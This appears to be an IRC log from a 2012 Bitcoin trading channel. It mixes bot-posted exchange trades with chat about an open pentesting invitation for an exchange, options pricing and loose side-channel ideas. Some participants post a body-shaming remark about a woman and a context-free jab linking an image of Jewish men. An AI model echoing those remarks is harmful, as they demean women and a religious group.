01:12:08 [GLBSE] [GIGAMINING] 2 @ 1.02999999 = 2.06 BTC [+] Aug 17 01:12:23 [GLBSE] [GIGAMINING] 10 @ 0.95 = 9.5 BTC [-] Aug 17 01:12:48 [GLBSE] [BITBOND] 1 @ 0.399999 BTC [+] Aug 17 01:15:23 [GLBSE] [FPGA.CONTRACT] 6 @ 0.1599 = 0.9594 BTC [+] Aug 17 01:26:01 http://www.reddit.com/r/Bitcoin/comments/y99z3/go_long_or_short_with_bitcoin_again_up_to_10x/c5thkwg Aug 17 01:26:05 ahahaa this is so darned funny. Aug 17 01:26:42 Anyone know at what point Godaddy autorenews a domain? Aug 17 01:27:22 after it's expired and they can get it ? Aug 17 01:27:29 Obsi: you should change obsi.1mhs to daily dividend =P Aug 17 01:27:59 [GLBSE] [NASTY] 3 @ 0.51 = 1.53 BTC [+] Aug 17 01:28:13 I'd have to change the contract and do more math and stuff Aug 17 01:28:27 :< Aug 17 01:28:29 daily dividends really burn a lot of admin time Aug 17 01:28:41 I dont want to wait until the 19th =/ Aug 17 01:28:45 Diablo-D3: that domain I told you about that is expiring today it still hasn't autorenewed Aug 17 01:28:53 heh Aug 17 01:28:54 dude Aug 17 01:28:56 godaddy is shit Aug 17 01:28:59 why are you still using them Aug 17 01:29:02 you should know better Aug 17 01:29:06 hour and a half till it's expired Aug 17 01:29:14 [GLBSE] [OBSI.HRPT] 1 @ 0.1038 BTC [+] Aug 17 01:29:42 I'm not using godaddy... they are Aug 17 01:29:49 oh Aug 17 01:29:53 then they're fucked lol Aug 17 01:30:04 it's your fav company of course Aug 17 01:30:27 who? Aug 17 01:30:43 butterflylabs.com Aug 17 01:30:43 google.com is expiring? Aug 17 01:30:49 ahaha Aug 17 01:30:49 [GLBSE] [NASTY] 1 @ 0.51 BTC [+] Aug 17 01:30:52 OH RIGHT Aug 17 01:30:54 THEM Aug 17 01:31:09 I KNEW ABOUT THIS Aug 17 01:31:15 AND I TOLD EVERYONE Aug 17 01:31:17 BUT EVERYONE WAS LIKE Aug 17 01:31:17 THEY'LL RENEW Aug 17 01:31:26 WELL HOWS THAT GOING FOR YOU?! Aug 17 01:31:26 I hope they do Aug 17 01:31:30 Aug 17 01:31:39 not sure how godaddy handles it Aug 17 01:31:40 I hope they dont, Im hungry for popcorn Aug 17 01:32:34 [GLBSE] [ASICMINER] 10 @ 0.105 = 1.05 BTC [+] Aug 17 01:32:53 [GLBSE] [BDT] 1 @ 0.989 BTC [-] Aug 17 01:33:14 [GLBSE] [ASICMINER] 2 @ 0.105 = 0.21 BTC [+] Aug 17 01:34:21 godaddy holds their domains forever, calls and emails countless notices of expiration. I havent had success nabbing expiring domains from them but I wish you luck. Aug 17 01:34:49 do they wait for the expiration date to pass before auto-renewing? Aug 17 01:35:00 Ignatius-otc: they self-squat? wow Aug 17 01:35:02 hmm, anyone with a reddit account ? Aug 17 01:35:12 mircea_popescu: me Aug 17 01:35:39 Mind putting MPEx up there for a free-for-all pentesting ? Aug 17 01:35:51 they self squat for very long periods of time,so that they can then sell the domain back to the true owner for around $100 USD. As for auto-renew before or after expiration, afaik it happens before the actual expiration date. Aug 17 01:36:17 mircea_popescu: no Aug 17 01:36:20 People that manage to get aything useful get faq mentions/1.337 btc Aug 17 01:36:21 Obsi: don't know about godaddy but some do Aug 17 01:36:25 bfl was it? they sure are busy right now...too busy to field phone calls and emails:P Aug 17 01:36:37 mircea_popescu: wont touch that with 25 foot pole Aug 17 01:37:15 mkay. anyone with a reddit account and a longer pole than Diablo-D3's ? Aug 17 01:38:18 lol Aug 17 01:39:11 i have a reddit acct Aug 17 01:39:46 and i'me better than average in the pole dept. Aug 17 01:39:52 that;s cool Aug 17 01:40:09 why d'ya ask mp? Aug 17 01:40:23 so please put mpex up going hey, free for all pentesting, anyone getting anything useful gets faq mentions and 1.337 btc. Aug 17 01:40:46 reports to be forwarded to http://trilema.com/wp-content/uploads/office.jpg Aug 17 01:41:17 $17? Aug 17 01:41:41 it's a hacker thing. Aug 17 01:41:52 you want me to ask reddit to hack you? Aug 17 01:41:53 [GLBSE] [YABMC] 2 @ 0.1179 = 0.2358 BTC [+] Aug 17 01:42:00 sure. Aug 17 01:42:27 alright, can I have a clearsigned msg saying it's ok by you Aug 17 01:42:35 i'll post it along with it Aug 17 01:42:44 that would be good Aug 17 01:42:44 [GLBSE] [ASICMINER] 2 @ 0.105 = 0.21 BTC [+] Aug 17 01:44:05 ya 1 sec Aug 17 01:44:55 Where are you hosted MP? I have yet to find a host who would approve of such a thing/honeypot. Aug 17 01:46:09 so who's buying/selling s.mpoe going into this? :) Aug 17 01:46:27 precisely, the reddit crowd would just as quickly ddos Aug 17 01:46:38 mircea_popescu: i hope you have an offline backup of the db Aug 17 01:46:55 [GLBSE] [BDT] 1 @ 0.989 BTC [-] Aug 17 01:47:01 [GLBSE] [TYGRR.BOND-P] 1 @ 0.9998 BTC [+] Aug 17 01:47:03 [GLBSE] [TYGRR.BOND-P] 7 @ 0.99000001 = 6.93 BTC [-] Aug 17 01:47:05 [GLBSE] [TYGRR.BOND-P] 327 @ 0.99 = 323.73 BTC [-] Aug 17 01:47:11 is there a particular subreddit that would be best for this sort of thing? Aug 17 01:47:25 netsec maybe Aug 17 01:47:31 smickles http://pastebin.com/jkG76WhE Aug 17 01:47:37 http://www.reddit.com/r/Bitcoin/comments/y99z3/go_long_or_short_with_bitcoin_again_up_to_10x/c5thkwg Aug 17 01:47:40 whichever this is in Aug 17 01:48:46 ok, /r/bitcoin and i guess i'll crosspost to /r/netsec Aug 17 01:49:11 Somebody start betting on the outcome of this? http://betsofbitco.in Aug 17 01:49:24 haha that your site ? Aug 17 01:49:33 prolly not Aug 17 01:49:38 not mine, no Aug 17 01:50:51 there is a reddit for pentesting Aug 17 01:50:57 Ive seen it when wandering around Aug 17 01:52:03 might want to clarify it's just over 1 BTC, some people might think you're paying 1,337 Aug 17 01:52:04 man my internet has gone to shit awfully fast Aug 17 01:52:27 i think 1.3 should be clear to anyone nej ? Aug 17 01:52:36 can i say "at least 1.337 BTC"? Aug 17 01:52:39 bitcoin uses . not , Aug 17 01:52:54 I dont care what your local currency is Aug 17 01:52:55 smickles why not just copy the clearsigned thing ? Aug 17 01:52:58 its . Aug 17 01:52:58 yeah but many people use . and may get confused Aug 17 01:53:08 oh, i haven't read it yet :o Aug 17 01:54:01 1,337 would bring in a whole new class of hackers that you wouldn't want to confuse Aug 17 01:54:23 then we might get to see more than a ddos:-/ Aug 17 01:54:28 1,337 isnt a number Aug 17 01:54:33 Obsi: :3 Aug 17 01:54:39 yes it is Aug 17 01:54:48 it's two numbers in csv Aug 17 01:54:49 one thousand three hundred and thirty seven Aug 17 01:54:50 http://www.reddit.com/r/Bitcoin/comments/ycgm8/freeforall_pentesting_on_mpex/ Aug 17 01:55:13 lol you c/p'd the signature too liek a noob! Aug 17 01:55:35 i meant copy the text and leave a link to the pastebin Aug 17 01:56:00 also, who is Micea Aug 17 01:56:11 lol Aug 17 01:56:13 hahaah Aug 17 01:56:24 poor smickles. he just wanted to help Aug 17 01:56:25 spell fail Aug 17 01:56:28 lol, well, i guess i just don't care Aug 17 01:56:28 theres an r in there Aug 17 01:56:35 mircea_popescu: where is teh faq Aug 17 01:56:46 and what timeframe shoudl I give the bet Aug 17 01:56:47 SMICKLES / He just doesn't care Aug 17 01:56:49 first link atop teh site, http://polimedia.us/bitcoin/faq.html Aug 17 01:57:00 that's just how they roll in smicklandia. Aug 17 01:57:12 lol, i really f'd it up Aug 17 01:57:34 [GLBSE] [BDT] 18 @ 0.85 = 15.3 BTC [-] Aug 17 01:57:36 i'd guess a week ? Aug 17 01:57:53 i really shouldn't be doing this sorta thing at bedtime Aug 17 01:57:57 now i'll be too excited to sleep. Aug 17 01:58:02 how about a month Aug 17 01:58:04 LOL Aug 17 01:58:09 can take a week to get the bet approved Aug 17 01:58:11 mircea_popescu: HELLO BROTHER! Aug 17 01:58:27 thanks smickles Aug 17 01:58:28 man, I need to get a short blond friend Aug 17 01:58:32 mircea_popescu: What platform are you running on etc? Aug 17 01:58:36 end of september? Aug 17 01:58:39 so I have an excuse to wear a giant suit of armor Aug 17 01:59:59 oh, alright, it bothered me, so i corrected it Aug 17 02:00:40 MoneyIsDebt this'd be just the webserver. Aug 17 02:01:06 'comon all, upvote it quickly Aug 17 02:01:20 it's an acceleration algo to get to the front page Aug 17 02:01:30 the first hour bein the most important Aug 17 02:01:52 fine fine Aug 17 02:02:07 o they do the acceleration thing ? Aug 17 02:03:28 mircea_popescu: is there a timeframe beyond which you will not honour it? Aug 17 02:03:38 not really. Aug 17 02:05:35 ok, running the bet till end of september Aug 17 02:06:34 [GLBSE] [BIB.PIRATE] 1 @ 0.9901 BTC [-] Aug 17 02:06:48 dub, how about i link to the bet (that you are setting up?) in the reddit post Aug 17 02:07:05 would be good but it isnt online until they approve Aug 17 02:07:30 do they give you a link before it's approved (youtube style)? Aug 17 02:08:06 http://www.betsofbitco.in/item?id=566 Aug 17 02:08:48 dub: cool Aug 17 02:09:12 does that 566 indicate how many bets so far ? Aug 17 02:10:27 it's like an article id mp Aug 17 02:11:03 ya but, does it increment by 1 each new proposed bet ? Aug 17 02:11:10 nope Aug 17 02:11:45 i can tell you didn't write your own blog software Aug 17 02:12:06 mmm, wordpress actually does. Aug 17 02:12:57 mircea_popescu: if someone wants to sell options with you, do they need to leave you some coins to cover cases when the options are exercised? Aug 17 02:13:05 yes coingenuity Aug 17 02:13:08 oops. copumpkin Aug 17 02:13:15 3 points (80% like it) 4 up votes 1 down vote << ok whoddunit! Aug 17 02:13:19 buncha haters. Aug 17 02:13:27 lol, reddit always injects random downvotes Aug 17 02:13:36 mircea_popescu: how much do we need to leave with you? Aug 17 02:13:54 for calls, 1 btc. for puts, the present put value. Aug 17 02:14:04 hmm Aug 17 02:14:05 on a 20 put with price at 10, 1 btc. Aug 17 02:14:44 [GLBSE] [BITBOND] 1 @ 0.399999 BTC [+] Aug 17 02:14:45 I see, I think Aug 17 02:15:06 it's full coverage, as it were. Aug 17 02:16:04 [GLBSE] [OBSI.HRPT] 4 @ 0.10388 = 0.4155 BTC [+] Aug 17 02:24:08 [GLBSE] [YARR] 1 @ 1.45 BTC [+] Aug 17 02:27:36 course on the bet thing... you folks realise that it's darn easy to game Aug 17 02:27:47 as in, the person who finds a hole steals all yer coinz too. Aug 17 02:31:55 yeah, find hole, place bet, exploit hole, ???, profit Aug 17 02:32:10 it's on the front page Aug 17 02:32:21 with 3 upvotes Aug 17 02:32:23 a hey cool. Aug 17 02:32:40 you had a golden hand. Aug 17 02:33:15 https://bitcointalk.org/index.php?topic=2604.0 this is not serious ? Aug 17 02:33:48 I think it is Aug 17 02:34:59 he has been willing to whore himself to any vaguely bitcoin related retardation to date Aug 17 02:35:42 i see Aug 17 02:36:03 also, jews. http://firstlightforum.files.wordpress.com/2012/01/ultra-orthodox-jews2.jpg Aug 17 02:36:10 probably moreso now, facing liability for bitcoinica shit Aug 17 02:36:36 submitted 18 minutes ago* by smickles Aug 17 02:36:41 jeez! i made it 1/4 hour! Aug 17 02:36:54 mircea_popescu: wtfimage Aug 17 02:36:56 more like 40 minutes by my watch but anyway Aug 17 02:39:12 dub i still don't quite comprehend what those people were thinking. forex-y bitbucket ran by guy in china/taiwan. let us buy it while we reside in fresno ? Aug 17 02:39:15 what.da.fuck. Aug 17 02:41:17 what happened after they took over is more wtf imo Aug 17 02:41:31 like, not checking if there were backups.. Aug 17 02:41:56 like, not insta-changing all pws for everyrhing. Aug 17 02:42:46 [GLBSE] [FOO.PPPPT] 3 @ 1.054 = 3.162 BTC [+] Aug 17 02:43:03 [GLBSE] [FPGAMINING] 4 @ 0.9001 = 3.6004 BTC [-] Aug 17 02:43:05 [GLBSE] [FPGAMINING] 2 @ 0.9 = 1.8 BTC [-] Aug 17 02:43:22 both are fairly wtfy Aug 17 02:43:40 bitcoin is not the fronteer. it's the twilight zone Aug 17 02:43:55 but for once they splurged and hired kafka's daughter by mark twain to do the script. Aug 17 02:46:41 fyi, betsofbitcoin is not widely trusted, I would personally not put any significant amount with them. In case anyone was planning to, don't cry to me :) Aug 17 02:48:01 Hi MoneyIsDubstep! Aug 17 02:50:04 [MPEX] [S.MPOE] 1000 @ 0.00037686 = 0.3769 BTC [-] Aug 17 02:52:51 well this is anticlimatic Aug 17 02:53:31 [GLBSE] [OBSI.HRPT] 99 @ 0.1038 = 10.2762 BTC [-] Aug 17 02:57:03 [MPEX] [S.MPOE] 18800 @ 0.00037686 = 7.085 BTC [-] Aug 17 03:01:33 [GLBSE] [FPGA.CONTRACT] 3 @ 0.1599 = 0.4797 BTC [+] Aug 17 03:02:58 [GLBSE] [FOO.PPPPT] 3 @ 1.054 = 3.162 BTC [+] Aug 17 03:03:52 [MPEX] [S.MPOE] 3600 @ 0.00037686 = 1.3567 BTC [-] Aug 17 03:03:58 [GLBSE] [FZB.A] 90 @ 0.03 = 2.7 BTC [-] Aug 17 03:04:47 [GLBSE] [BITBOND] 6 @ 0.3951 = 2.3706 BTC [-] Aug 17 03:04:50 [GLBSE] [BITBOND] 1 @ 0.395 BTC [-] Aug 17 03:05:10 [GLBSE] [OBSI.HRPT] 20 @ 0.10388 = 2.0776 BTC [+] Aug 17 03:06:09 [GLBSE] [GIGAMINING] 4 @ 1.0279 = 4.1116 BTC [+] Aug 17 03:06:11 [GLBSE] [GIGAMINING] 1 @ 1.028 BTC [+] Aug 17 03:06:23 [GLBSE] [FZB.A] 100 @ 0.03 = 3 BTC [-] Aug 17 03:06:28 [GLBSE] [HYDRO.BONDS] 3 @ 1.4598 = 4.3794 BTC [+] Aug 17 03:07:17 [GLBSE] [DMC] 10 @ 0.06 = 0.6 BTC [+] Aug 17 03:12:11 [GLBSE] [CIUCIU.BOND] 10 @ 0.1 = 1 BTC [+] Aug 17 03:14:03 [MPEX] [F.GIGA.ETF] 1500 @ 0.00092147 = 1.3822 BTC [-] Aug 17 03:14:03 [MPEX] [F.GIGA.ETF] 4700 @ 0.00090614 = 4.2589 BTC [-] Aug 17 03:14:16 [GLBSE] [TEEK.USD] 10 @ 0.074 = 0.74 BTC [+] Aug 17 03:15:59 [GLBSE] [ASICMINER] 15 @ 0.1049 = 1.5735 BTC [-] Aug 17 03:17:01 I should change the name of DMC Aug 17 03:18:23 Is D for default or dead? ;) Aug 17 03:18:36 [GLBSE] [OBSI.HRPT] 5 @ 0.10388 = 0.5194 BTC [+] Aug 17 03:18:38 hurr Aug 17 03:21:31 It got quiet in here... everyone off hacking mircea_popescu 's site? Aug 17 03:21:42 [GLBSE] [NYAN.B] 2 @ 1 = 2 BTC [+] Aug 17 03:22:11 lolz Aug 17 03:22:14 it's not dead yet! Aug 17 03:23:19 [GLBSE] [NYAN.A] 2 @ 1 = 2 BTC [-] Aug 17 03:29:27 [GLBSE] [COGNITIVE] 2 @ 0.6301 = 1.2602 BTC [-] Aug 17 03:30:49 [GLBSE] [JTME] 1 @ 0.99999992 BTC [+] Aug 17 03:43:13 wow i was busy today and wasn't following anythign really Aug 17 03:43:28 and there is like 20+ pages of BDT / JRO / blah blah blah crap Aug 17 03:43:30 holy Aug 17 03:43:31 :P Aug 17 03:44:30 [GLBSE] [PPT.DIV] 4 @ 0.50969 = 2.0388 BTC [+] Aug 17 03:44:32 [GLBSE] [PPT.DIV] 8 @ 0.50979 = 4.0783 BTC [+] Aug 17 03:44:35 [GLBSE] [PPT.DIV] 8 @ 0.5099 = 4.0792 BTC [+] Aug 17 03:44:37 [GLBSE] [PPT.DIV] 8 @ 0.51 = 4.08 BTC [+] Aug 17 03:44:39 [GLBSE] [PPT.DIV] 3 @ 0.5149 = 1.5447 BTC [+] Aug 17 03:44:41 [GLBSE] [PPT.DIV] 5 @ 0.515 = 2.575 BTC [+] Aug 17 03:44:43 [GLBSE] [PPT.DIV] 6 @ 0.515 = 3.09 BTC [+] Aug 17 03:44:46 [GLBSE] [PPT.DIV] 1 @ 0.518 BTC [+] Aug 17 03:44:48 [GLBSE] [PPT.DIV] 2 @ 0.518 = 1.036 BTC [+] Aug 17 03:44:50 [GLBSE] [PPT.DIV] 3 @ 0.518 = 1.554 BTC [+] Aug 17 03:44:52 [GLBSE] [PPT.DIV] 4 @ 0.519 = 2.076 BTC [+] Aug 17 03:44:55 [GLBSE] [PPT.DIV] 8 @ 0.52 = 4.16 BTC [+] Aug 17 03:45:29 teek must read it ALL Aug 17 03:45:31 [GLBSE] [FOO.PPPPT] 7 @ 1.054 = 7.378 BTC [+] Aug 17 03:46:47 [MPEX] [S.MPOE] 6100 @ 0.00037686 = 2.2988 BTC [-] Aug 17 03:46:48 [MPEX] [S.MPOE] 20260 @ 0.00037829 = 7.6642 BTC [+] Aug 17 03:48:00 [GLBSE] [TYGRR.BOND-P] 1 @ 0.9999 BTC [+] Aug 17 03:49:11 yeah.. i think im gonna have too Aug 17 03:52:29 [GLBSE] [ASICMINER] 9 @ 0.105 = 0.945 BTC [+] Aug 17 03:53:51 [GLBSE] [ASICMINER] 1 @ 0.105 BTC [+] Aug 17 03:55:31 http://www.positivemoney.org.uk/2012/08/imf-working-paper-offers-supports-full-reserve-banking/ Aug 17 03:55:43 whoa the imf is competing with btc nao Aug 17 03:57:45 [GLBSE] [ASICMINER] 41 @ 0.105 = 4.305 BTC [+] Aug 17 04:06:00 [GLBSE] [OBSI.HRPT] 1 @ 0.10387 BTC [-] Aug 17 04:06:13 [MPEX] [S.MPOE] 29300 @ 0.0003965 = 11.6175 BTC [+] Aug 17 04:07:24 if bitcoin's impact on history is it knocked the world into using full reserve banking. i'd say net gain Aug 17 04:10:18 mircea_popescu: what just happened to the data on http://polimedia.us/bitcoin/mpex.php?mpsic=O.BTCUSD.P130T ? Aug 17 04:10:22 there was a lot more stuff on it a minute ago Aug 17 04:10:28 oh, it's back Aug 17 04:11:01 mmm what data you mean ? Aug 17 04:11:20 buys/sells well sometimes the bot's orders expire before it notices. Aug 17 04:12:24 would that be the amount of time it take for the bot to run the calculation? Aug 17 04:12:43 nah Aug 17 04:12:51 that could be an interesting side-channel attack Aug 17 04:13:09 how do you see it ? Aug 17 04:13:36 [GLBSE] [BITBOND] 1 @ 0.399899 BTC [+] Aug 17 04:15:26 well, (just off hand) you are prolly using a modified BS or the binomial method to value the options. the side channel attack could use an assumption of what sort of hardware you have + the amount of time it taks for the bot to do it's calc + the method used to calc value and deduce the unknown values you use in valuing your options, then take advantage Aug 17 04:15:58 that is, if the attacker knew you were valuing incorrectly anyway Aug 17 04:16:23 they could find the ideal way to take advantage of the misvaluation Aug 17 04:16:33 you understand the webserver is just relaying the actual trade db tho Aug 17 04:16:33 however, your bot's spreads are huge Aug 17 04:16:39 so it's probably a moot point Aug 17 04:17:35 yeah, if the trade expires - no trade in the db if the bot hasn't calcd its desired trade yet, right? Aug 17 04:18:39 yea but what i mean the dt between no bid being offered and bid popping on the webserver Aug 17 04:19:08 is not too close to the dt' between same in trade db, so your attack avenue doesn't really work Aug 17 04:19:41 seems more like a (pretty strong) random number generator than anything. Aug 17 04:19:43 well maybe that's why i'm not a comp sci phd Aug 17 04:19:58 it'd pretty much measure entropy i think. Aug 17 04:20:16 those sorts of attacks are high level academic stuffs Aug 17 04:20:25 well not so much. Aug 17 04:20:43 for instance, a new way to steal cards consists of using a laser to measure temperature right after owner used the card Aug 17 04:20:49 apparently they can get the key sequence Aug 17 04:21:45 that's be a nifty aparatus to set up, and no one notice it Aug 17 04:22:26 huh, what's that thing fastened above the atm? Aug 17 04:23:24 anyway, what i meant is that i read about using computation time sidechanel attacks in relation to cracking some crypto Aug 17 04:23:29 lasers work over a good distance. Aug 17 04:23:46 http://i.imgur.com/rmd6Z.png jesus god look at that. Aug 17 04:24:22 uh? Aug 17 04:24:29 ime? Aug 17 04:24:39 Also Bitcoinica was losing money because its hedging algorithm was too simple, and during the last few months the site had negative profit. Aug 17 04:24:40 dff? Aug 17 04:24:54 https://bitcointalk.org/index.php?topic=93319.msg1038189#msg1038189 old taaki post Aug 17 04:26:11 it's a sidemeasure of technical volatility. Aug 17 04:28:09 [MPEX] [S.MPOE] 27600 @ 0.0003965 = 10.9434 BTC [+] Aug 17 04:28:51 http://bitcoinmedia.com/uploads/2012/05/moving-price-diff.png Aug 17 04:29:02 that's a nicer version of it Aug 17 04:30:41 [GLBSE] [NASTY] 1 @ 0.5 BTC [-] Aug 17 04:30:45 pretty meaningless tho. Aug 17 04:32:55 mircea_popescu: Couple of questions for you, got a minute? Aug 17 04:33:07 https://bitcointalk.org/index.php?topic=74216.msg1105596#msg1105596 s²cm's financial report Aug 17 04:33:08 shoot! Aug 17 04:33:46 [GLBSE] [MOORE] 3 @ 0.51408 = 1.5422 BTC [+] Aug 17 04:33:54 [GLBSE] [MOORE] 4 @ 0.51418 = 2.0567 BTC [+] Aug 17 04:34:08 Does the symbole change each month for the options? Aug 17 04:34:11 > "All options expire on the last minute of the last Friday of their month (UTC times)." Aug 17 04:34:18 Azelphur: Aug 17 04:34:46 sgornick_ in general the symbols stay the same. due to the explosion of btc i retired the halfdollar symbols and added 11 through 20 dollars instead. i have the ability to do this as needed. Aug 17 04:35:13 but barring significant moves of price they just remain the same. Aug 17 04:35:18 mircea_popescu: you know, the 20 doesn't have a delta > 0.999 Aug 17 04:35:40 smickles calls you mean ? Aug 17 04:35:42 Well, I mean does my holdings of T become holdings of N on the last Friday of the month? Aug 17 04:35:50 sgornick_ indeed they do, yes. Aug 17 04:36:10 eh Aug 17 04:36:10 mircea_popescu: yea Aug 17 04:36:19 N becomes T, not the other way around Aug 17 04:36:33 Is that how other options systems work? Aug 17 04:36:42 O.BTCUSD.C200T 0.028 / 0.052. why 0.99 lol Aug 17 04:37:02 sgornick_ well other option systems might spell out the month in the options name, or use fixed month letters Aug 17 04:37:12 go A B C D E for may etc. Aug 17 04:37:33 some systems use a sort of technique kinda akin to url shortening too. Aug 17 04:37:35 mircea_popescu: well, shouldn't the highest available call have a delta of (practically) 1? Aug 17 04:37:43 Ok, that's what I though. Aug 17 04:37:48 smickles not unless it's infinity. Aug 17 04:37:49 > N becomes T, not the other way around <--- Ya, dyslexic. Aug 17 04:38:08 google options are GOOG120818C00465000 Aug 17 04:38:11 yeah Aug 17 04:38:15 [GLBSE] [MOORE] 3 @ 0.511109 = 1.5333 BTC [-] Aug 17 04:38:18 [GLBSE] [MOORE] 4 @ 0.511009 = 2.044 BTC [-] Aug 17 04:38:33 seems a tad confusing. i dunno, maybe i made a bad choice but it seemed to me more comfortable / intuitive esp for beginners. Aug 17 04:38:48 i can change them any time so it's not such a big deal either way i don't think. Aug 17 04:39:14 So when O.BTCUSD.C140T shows n/a for Last means not a single $14 CALL option was bought? Seems unlikely nobody wanted to. Aug 17 04:39:18 lol mircea_popescu Aug 17 04:39:28 you take user-unfriendly to the next level in your UI :P Aug 17 04:39:33 "Insufficient BTC." Aug 17 04:39:40 I know you're calculating the required amount to show me that message Aug 17 04:39:42 sgornick_ well... unlikely or not... it's the case. Aug 17 04:39:44 show me the required amount dammit :P Aug 17 04:39:53 copumpkin i beg your pardon, one second :D Aug 17 04:39:57 lol Aug 17 04:40:16 :) Aug 17 04:41:14 copumpkin try nao. Aug 17 04:41:23 [GLBSE] [PUREMINING] 23 @ 0.1529 = 3.5167 BTC [-] Aug 17 04:41:35 actually interacting with gpg isn't so bad, btw, if you just pipe commands together Aug 17 04:41:35 C200T best bid: 0.00187194 est value: 0.01503234 delta: 0.11572602 gamma: 0.04906771 put value: 0.51409795 put delta: -0.88427398 Aug 17 04:41:54 http://i.pgu.me/UDxEofcC_original.jpg does anyone actually believe this woman should be making money by whoring her misshapen hulk ?! Aug 17 04:41:55 Insufficient funds. You need at least 1101361573.37BTC to cover these. Aug 17 04:41:57 hmm! Aug 17 04:42:02 copumpkin this is what moajhahaha 1 sec Aug 17 04:42:04 lol Aug 17 04:42:37 also, can we chain commands? Aug 17 04:42:51 try agaion lol. and no chained commands yet,. Aug 17 04:42:58 it will come tho. Aug 17 04:43:01 so the delta on P200T is -0.88~ Aug 17 04:43:35 (based on the current bids on the calls) Aug 17 04:43:41 copumpkin> actually interacting with gpg isn't so bad, btw, if you just pipe commands together <<< most people find it's quite painless, esp if they have pympex. its one of those cases where the vixen looks sullen but she's quite charming once you get to know her. Aug 17 04:43:57 smickles how much'd you expect it ? Aug 17 04:44:25 that is some itti bitti titties Aug 17 04:44:34 i think i have tits comparable. Aug 17 04:44:43 esp if i lift something Aug 17 04:45:07 mircea_popescu: well, i think that the P200T delta is fair, but the fact that it's not -0.999 or lower would seem to imply market demand for options striking higher Aug 17 04:45:12 I'm dolly parton next to taht Aug 17 04:45:33 smickles delta is not a reflection of mkt demand unless the prices you use are issued by the mkt Aug 17 04:45:43 i can't use my own bot to decide what the market says now can i. Aug 17 04:46:19 but anyway, i can only change symbols on month ends and if you recall back on july 28 it didn't look so sure we'd hit 13. it was more like 9.x Aug 17 04:46:21 mircea_popescu: i ignore your bot in my calculation Aug 17 04:46:48 [GLBSE] [NASTY] 1 @ 0.5 BTC [-] Aug 17 04:46:53 i was considering getting maybe up to 30 strikes next month. esp if we keep climbing or at least hold Aug 17 04:47:13 sgornick_ that satisfies you or did you have more ? Aug 17 04:47:25 mircea_popescu: i'd like that, right now you don't offer a deep in the money put Aug 17 04:47:35 20 is not dim ?! Aug 17 04:47:48 not technically at a delta of -0.88 Aug 17 04:48:03 what are you, a pearl digger ? Aug 17 04:48:19 dim is supposed to be -0.999 or something like that Aug 17 04:48:23 you can dig for pearls? Aug 17 04:48:31 maybe a handful more nines Aug 17 04:48:37 well how do you call them, pearl holdbreathers ? Aug 17 04:48:44 divers Aug 17 04:49:17 smickles while it's true that 0.9x is dim, i don't think 0.9x is a requirement. pretty much 2-3 strikes away from atm is dim afaic. Aug 17 04:49:29 dub fine fine :p Aug 17 04:49:52 in a less volitile market 3 strikes away has a delta of 0.9x Aug 17 04:50:12 this is also true Aug 17 04:50:53 mpex users are implying a volitility > 153% Aug 17 04:51:36 with positions set which essentially equiate to a 4x leveraged lon positon Aug 17 04:51:40 volatile you know Aug 17 04:51:50 [GLBSE] [ASICMINER] 73 @ 0.105 = 7.665 BTC [+] Aug 17 04:52:00 and not all the trade volume is necessarily an open long position. Aug 17 04:52:02 english is flawed anyway Aug 17 04:52:59 but yes i am pretty loaded with people's long bets. Aug 17 04:53:08 yeah, i suppose i assume put-call pairity or w/e Aug 17 04:54:25 [MPEX] [S.MPOE] 49200 @ 0.00039634 = 19.4999 BTC [-] Aug 17 04:54:46 i'm not going to work on improving my algo on that stuffs until i get smex done Aug 17 04:55:13 smex hahaha Aug 17 04:56:13 ǒ Aug 17 04:56:28 http://pastebin.com/8XKZaPK6 this is kinda funny to read Aug 17 04:56:32 i mean © Aug 17 04:56:36 i had no ideea zhou was so obsequious Aug 17 04:57:21 smickles can you explain sc2m to me again ? Aug 17 05:00:08 [GLBSE] [TYGRR.BOND-P] 2 @ 0.9999 = 1.9998 BTC [+] Aug 17 05:01:39 mircea_popescu: zt came off that what to me when he was 'no longer working at bitcoinica, but doing stuff for them' for months Aug 17 05:02:51 [GLBSE] [BDT] 1 @ 0.988 BTC [+] Aug 17 05:02:56 [GLBSE] [BDT] 1 @ 0.9888 BTC [+] Aug 17 05:03:04 [GLBSE] [BDT] 5 @ 0.98898 = 4.9449 BTC [+] Aug 17 05:03:12 s²c, people bought non-equity shares, we placed the proceeds with various people who lend btc to people, we pay the received interest as dividends to the shareholders Aug 17 05:03:13 [GLBSE] [BDT] 3 @ 0.989 = 2.967 BTC [+] Aug 17 05:03:17 [GLBSE] [BDT] 5 @ 0.99 = 4.95 BTC [+] Aug 17 05:03:23 [GLBSE] [FOO.PPPPT] 1 @ 1.0399 BTC [-] Aug 17 05:04:07 so it's a sort of fund of banks ? Aug 17 05:04:23 i suppose it it Aug 17 05:04:25 *is Aug 17 05:04:49 well, wouldn't a fund have equity stakes in the banks? Aug 17 05:05:03 could be a fund of bank bonds. Aug 17 05:05:23 i kinda want s2 to issue a bond Aug 17 05:05:30 so that we can raise the nav Aug 17 05:06:29 either that, or raise the nav by issuing equity bearing shares which pay no dividend Aug 17 05:06:53 [GLBSE] [JAH] 10 @ 0.12 = 1.2 BTC [-] Aug 17 05:06:54 kinda like a strange preferred stock Aug 17 05:07:16 why would anyone want shares w/o dividend Aug 17 05:07:22 sounds to me like unpreferred lol Aug 17 05:07:44 mircea_popescu: http://www.investopedia.com/ask/answers/135.asp :) Aug 17 05:07:48 people who want a say in the actions of s2, and Aug 17 05:08:16 in the event of an unfavorable liquidation, they would be paid after the creditors, but before the non equity shares Aug 17 05:08:39 but s2 doesn't have any creditors right now Aug 17 05:08:46 so they'd be paid first Aug 17 05:09:04 im not sure that'd be useful, just confuse ppl. Aug 17 05:09:26 confuse ppl, raise funds, what's the difference j/k Aug 17 05:09:51 lol Aug 17 05:10:08 i dunno, imo for bitcoin nonvoting divcarrying equity is way better than the other way around. Aug 17 05:10:18 maybe its just me Aug 17 05:10:43 well, right now they have nonvoting divcarrying, no equity Aug 17 05:11:12 so basically... bonds Aug 17 05:11:12 bet is live Aug 17 05:11:21 jesus we're making such a mess of finance. Aug 17 05:11:32 it's not a bond tho Aug 17 05:11:46 dub hey, i made it long enough for bet to come live :D Aug 17 05:11:49 [MPEX] [S.MPOE] 11300 @ 0.00039634 = 4.4786 BTC [-] Aug 17 05:11:50 [MPEX] [S.MPOE] 38400 @ 0.0003965 = 15.2256 BTC [+] Aug 17 05:11:51 there's nothing about returning the principal and no expiration Aug 17 05:12:50 ikr. Aug 17 05:13:06 heh, well, i wrote up that contract based on what splatster wanted to make Aug 17 05:13:23 and then promised to do the accounting Aug 17 05:14:26 mircea_popescu: "NOTE : You must have a key already 